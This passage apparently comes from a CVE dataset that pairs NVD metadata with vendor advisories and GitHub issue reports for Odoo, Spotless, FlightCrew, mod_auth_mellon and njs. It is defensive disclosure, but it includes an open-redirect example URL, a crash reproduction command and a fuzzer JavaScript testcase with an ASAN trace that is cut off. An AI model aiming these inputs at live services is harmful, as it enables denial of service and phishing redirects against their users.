"cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/odoo/odoo/issues/32513
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-13 The module-description renderer in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not disable RST's local file inclusion, which allows privileged authenticated users to read local files via a crafted module description. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Core **Credits**: Stephane Bidoul (ACSONE SA) **CVE ID**: [CVE-2018-14886](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14886) ## I. Background The description of Odoo modules can be written in several formats, including reStructuredText (RST) format. RST syntax provides a directive to include local system files, as a way to reuse text components. ## II. Problem Description The directive to include local system files is not deactivated by the module description renderer. ## III. Impact **Attack Vector**: Network exploitable **Authentication**: Privileged user account required **CVSS3 Score**: Medium :: 6.8 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N) An attacker with a privileged user account could craft a fake module description in order to retrieve the content of local files that may contain sensitive information. This could be used to access the contents of Odoo configuration files and other system files readable by the Odoo service, which could include sensitive data such as passwords. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround Attackers exploiting this vulnerability can only access files readable by the system user executing Odoo. Sensitive files might therefore be protected by using filesystem-level permissions to block access to the Odoo user. It is very hard to effectively secure a system in this manner, so applying the patch or updating is strongly recommended. Odoo Cloud servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: 9b4dfd99783447fb2aec6028880805e5050a4655 - 10.0: 4c7e74f5e93a4832db8b8e15beb70a4aa90b2eee - 11.0: 7fbf7e233ce9ca485ef89f90872042a0a247274e - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-13 (CVE-2018-14886) - The module-description renderer...
https://api.github.com/repos/odoo/odoo/issues/32513/comments
0
2019-04-08T13:37:58Z
2019-04-08T13:38:00Z
https://github.com/odoo/odoo/issues/32513
430,456,802
32,513
450
CVE-2018-14887
2019-06-28T18:15:10.613
Improper Host header sanitization in the dbfilter routing component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows a remote attacker to deny access to the service and to disclose database names via a crafted request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 2.2, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32511" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/commits/master" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32511" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/odoo/odoo/issues/32511
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-11 Improper Host header sanitization in the dbfilter routing component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows a remote attacker to deny access to the service and to disclose database names via a crafted request. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Odoo Framework **Credits**: Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14887](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14887) ## I. Background System administrators can configure a database filter in their Odoo service, in order to host multiple databases on the same Odoo server, and dynamically assign each request to the right database. This is set using the "dbfilter" config parameter, which can use regular expressions patterns, and placeholders that will be replaced by the domain (%d) and host (%h) of the request. ## II. Problem Description The placeholders were not properly sanitized before being injected in the final db_filter expression used for the dynamic assignation. ## III. Impact Access Vector: Network exploitable Access Complexity: Low **Authentication**: Public **CVSS3 Score**: Medium :: 6.5 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H) If the web server in front of the Odoo service is configured to allow arbitrary domain names (VHosts), for example with a wildcard expression for subdomains, or if the Odoo service is directly exposed to the internet, an attacker could craft a request to cause a malicious db_filter evaluation. This could be used to trigger: - a leak of the names of available databases hosted on the same server, even if database listing was disabled by the administrator - a denial of service (via a voluntarily inefficient regular expression) The specific configuration necessary to make this exploitable is considered very rare and unlikely in practice. Odoo S.A. is not aware of any malicious use of this vulnerability. ## IV. Workaround Only systems relying on db_filter with a %d or %h placeholder **and** a wildcard virtual host in their web server (or directly exposing the Odoo service) are vulnerable. If that is your case, a workaround is to make sure you have properly setup a web server in front of Odoo (e.g. nginx or Apache), and remove any wildcard expression from virtual hosts configured in the web server. You can replace those expressions with fixed host names, or with stricter expressions that only allows alphanumeric characters. Odoo Cloud servers were never vulnerable to this, as they do not use db_filter. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: afde870da4d2af0d9b40f907261d1ea5d48864d2 - 10.0: 4e4dd4dfa2b898c064df93199f882c3829574d44 - 11.0: 6d83f700144b29150050900430e8166d3d3345f7 - 11.0-ent, 10.0-ent and 9.0 (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-11 (CVE-2018-14887) - Improper Host header sanitizati...
https://api.github.com/repos/odoo/odoo/issues/32511/comments
0
2019-04-08T13:37:52Z
2019-04-08T13:37:55Z
https://github.com/odoo/odoo/issues/32511
430,456,748
32,511
451
CVE-2019-9843
2019-06-28T18:15:15.330
In DiffPlug Spotless before 1.20.0 (library and Maven plugin) and before 3.20.0 (Gradle plugin), the XML parser would resolve external entities over both HTTP and HTTPS and didn't respect the resolveExternalEntities setting. For example, this allows disclosure of file contents to a MITM attacker if a victim performs a spotlessApply operation on an untrusted XML file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 4.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/blob/master/plugin-gradle/CHANGES.md#version-3200---march-11th-2018-javadoc-jcenter" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/blob/master/plugin-maven/CHANGES.md#version-1200---march-14th-2018-javadoc-jcenter" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/issues/358" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/pull/369" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7406e297228c42deeecdd12a576e39d63073faebf14b027b7608fdfd%40%3Cissues.iceberg.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/blob/master/plugin-gradle/CHANGES.md#version-3200---march-11th-2018-javadoc-jcenter" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/blob/master/plugin-maven/CHANGES.md#version-1200---march-14th-2018-javadoc-jcenter" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/issues/358" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/diffplug/spotless/pull/369" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7406e297228c42deeecdd12a576e39d63073faebf14b027b7608fdfd%40%3Cissues.iceberg.apache.org%3E" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:diffplug:gradle:*:*:*:*:*:spotless:*:*", "matchCriteriaId": "399D30A2-C49C-4F7A-A0F7-BD7B94E6D05C", "versionEndExcluding": "3.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:diffplug:maven:*:*:*:*:*:spotless:*:*", "matchCriteriaId": "276177BC-5902-4017-AD5B-02F623DB7BFE", "versionEndExcluding": "1.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/diffplug/spotless/issues/358
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "diffplug", "spotless" ]
Original Comment: https://github.com/diffplug/spotless/issues/308#issuecomment-463297964 > ``` > 12:48:55.013 [DEBUG] [sun.net.www.protocol.http.HttpURLConnection] Redirected from http://java.sun.com/xml/ns/javaee/javaee_5.xsd to http://www.oracle.com/webfolder/technetwork/jsc/xml/ns/javaee/javaee_5.xsd > ``` If we are seeing HTTP get requests inside of the XML parser that means that the parser is vulnerable to [XXE](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing). We need to fix this so that the spotless XML formatter is not making external entity requests. We can't have our linting infrastructure making web requests. Especially web requests over HTTP as those can be maliciously intercepted by a MITM. Here's an example where this has been a serious problem in the past. https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/ CC: @nedtwigg This is a security vulnerability in spotless and should be treated as such.
CVE-2019-9843: The XML parser isn't respecting resolveExternalEntities as false
https://api.github.com/repos/diffplug/spotless/issues/358/comments
31
2019-02-13T20:52:58Z
2019-03-18T20:52:07Z
https://github.com/diffplug/spotless/issues/358
409,996,752
358
452
CVE-2019-13032
2019-06-28T23:15:09.343
An issue was discovered in FlightCrew v0.9.2 and earlier. A NULL pointer dereference occurs in GetRelativePathToNcx() or GetRelativePathsToXhtmlDocuments() when a NULL pointer is passed to xc::XMLUri::isValidURI(). This affects third-party software (not Sigil) that uses FlightCrew as a library.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Sigil-Ebook/flightcrew/issues/53" }, { "source": "cve@mitre.org", "tags": null, "url": "https://salvatoresecurity.com/fun-with-fuzzers-or-how-i-discovered-three-vulnerabilities-part-1-of-3/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4055-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Sigil-Ebook/flightcrew/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://salvatoresecurity.com/fun-with-fuzzers-or-how-i-discovered-three-vulnerabilities-part-1-of-3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://usn.ubuntu.com/4055-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flightcrew_project:flightcrew:*:*:*:*:*:sigil:*:*", "matchCriteriaId": "9CD25AA7-C650-4A1E-ABA6-5F189B404CC9", "versionEndExcluding": null, "versionEndIncluding": "0.9.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/Sigil-Ebook/flightcrew/issues/53
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Sigil-Ebook", "flightcrew" ]
**Summary** An issue was discovered in FlightCrew v0.9.2 and earlier. A NULL pointer dereference occurs in GetRelativePathToNcx() when a null pointer is passed to xc::XMLUri::isValidURI(). **Details** If the package.opf contains `<item>` elements without "href" attributes, then the variable "href" is set to an empty string on [ValidateEpub.cpp:118](https://github.com/Sigil-Ebook/flightcrew/blob/1847f8901ae892182490d06795ba1f9339bfa743/src/FlightCrew/Framework/ValidateEpub.cpp#L118). On [ValidateEpub.cpp:121](https://github.com/Sigil-Ebook/flightcrew/blob/1847f8901ae892182490d06795ba1f9339bfa743/src/FlightCrew/Framework/ValidateEpub.cpp#L121), "toX(href)" is called which returns a NULL pointer if href is empty. This pointer is then passed to xc::XMLUri::isValidURI() which dereferences it, causing a segmentation fault. In the attached null_ptr.zip, you'll see that the href attributes in EPUB/package.opf have been replaced by the attribute "malformed". **Impact** This vulnerability has very little security impact for Sigil users, but may be used as a Denial of Service attack against third-party software that uses FlightCrew as a library. **Steps to reproduce** 1) Download the attached "null_ptr.zip" 2) On a linux system, process "null_ptr.zip" using flightcrew-cli. `flightcrew-cli --input-file null_ptr.zip` At this point, flightcrew-cli will segfault. [null_ptr.zip](https://github.com/Sigil-Ebook/flightcrew/files/3330816/null_ptr.zip)
Null Pointer Dereference
https://api.github.com/repos/Sigil-Ebook/flightcrew/issues/53/comments
7
2019-06-26T15:32:15Z
2019-06-30T14:32:31Z
https://github.com/Sigil-Ebook/flightcrew/issues/53
461,041,671
53
453
CVE-2019-13038
2019-06-29T14:15:09.150
mod_auth_mellon through 0.14.2 has an Open Redirect via the login?ReturnTo= substring, as demonstrated by omitting the // after http: in the target URL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Uninett/mod_auth_mellon/issues/35#issuecomment-503974885" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00010.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5E3JVHURJJNDP63CKVX5O5MJAGCQV4K/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XU5GVFZW3C2M4ZBL4F7UP7N24FNUCX4E/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4291-1/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Uninett/mod_auth_mellon/issues/35#issuecomment-503974885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5E3JVHURJJNDP63CKVX5O5MJAGCQV4K/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XU5GVFZW3C2M4ZBL4F7UP7N24FNUCX4E/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4291-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mod_auth_mellon_project:mod_auth_mellon:*:*:*:*:*:apache:*:*", "matchCriteriaId": "8C1F9BDB-BA7E-425B-A94F-6E251666E4BE", "versionEndExcluding": null, "versionEndIncluding": "0.14.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/Uninett/mod_auth_mellon/issues/35#issuecomment-503974885
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Uninett", "mod_auth_mellon" ]
Hello, In IDP initiated login for Mellon, ReturnTo parameter could be really anything and that gets added as relayState. Once assertion is consumed, mellon redirects to relayState arbitrarily. This leads to Open Redirect security issue. Ideally, redirection code should check if its in same domain. Can this be tracked? For example, https://host/admin/auth/login?ReturnTo=https://www.google.com&IdP=<URL to IDP> Will redirect to Google after successful assertion. This would also lead to Phishing kind of attack.
Open Redirection issue
https://api.github.com/repos/Uninett/mod_auth_mellon/issues/35/comments
15
2015-05-15T18:06:24Z
2019-09-30T07:04:02Z
https://github.com/Uninett/mod_auth_mellon/issues/35
76,805,695
35
454
CVE-2019-13067
2019-06-30T00:15:11.283
njs through 0.3.3, used in NGINX, has a buffer over-read in nxt_utf8_decode in nxt/nxt_utf8.c. This issue occurs after the fix for CVE-2019-12207 is in place.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nginx/njs/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2A12AFA-F1E5-4E07-B86C-A6CC93CD2081", "versionEndExcluding": null, "versionEndIncluding": "0.3.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nginx/njs/issues/183
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
NJS version: ``` changeset: 1011:2fb43ddbce84 tag: tip user: hongzhidao <hongzhidao@gmail.com> date: Mon Jun 10 22:23:56 2019 -0400 summary: Added property getter/setter support in Object.defineProperty(). ``` JS Testcase: ```js (new InternalError(new Object(), RegExp().source.replace((Object((ReferenceError()+{get: function () { }}))||Object.isExtensible()), RegExp().source.replace((RegExp()||ignoreCase.startsWith()), function v0() { }, Number(), Boolean(), Error(), TypeError(), Boolean(), Error(), Object(), 0)))+0) ``` ASAN log: ``` ================================================================= ==3788==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5566629c2ab8 at pc 0x55666274915c bp 0x7ffefaee9990 sp 0x7ffefaee9980 READ of size 1 at 0x5566629c2ab8 thread T0 #0 0x55666274915b in nxt_utf8_decode nxt/nxt_utf8.c:72 #1 0x556662749796 in nxt_utf8_length nxt/nxt_utf8.c:271 #2 0x5566625d3857 in njs_string_replace_join njs/njs_string.c:3661 #3 0x5566625e40ee in njs_string_replace_regexp_join njs/njs_string.c:3280 #4 0x5566625e40ee in njs_string_replace_regexp njs/njs_string.c:3163 #5 0x5566625e40ee in njs_string_prototype_replace njs/njs_string.c:3058 #6 0x55666268dc13 in njs_function_native_call njs/njs_function.c:587 #7 0x5566625b0592 in njs_vmcode_continuation njs/njs_vm.c:2336 #8 0x5566625b0cb3 in 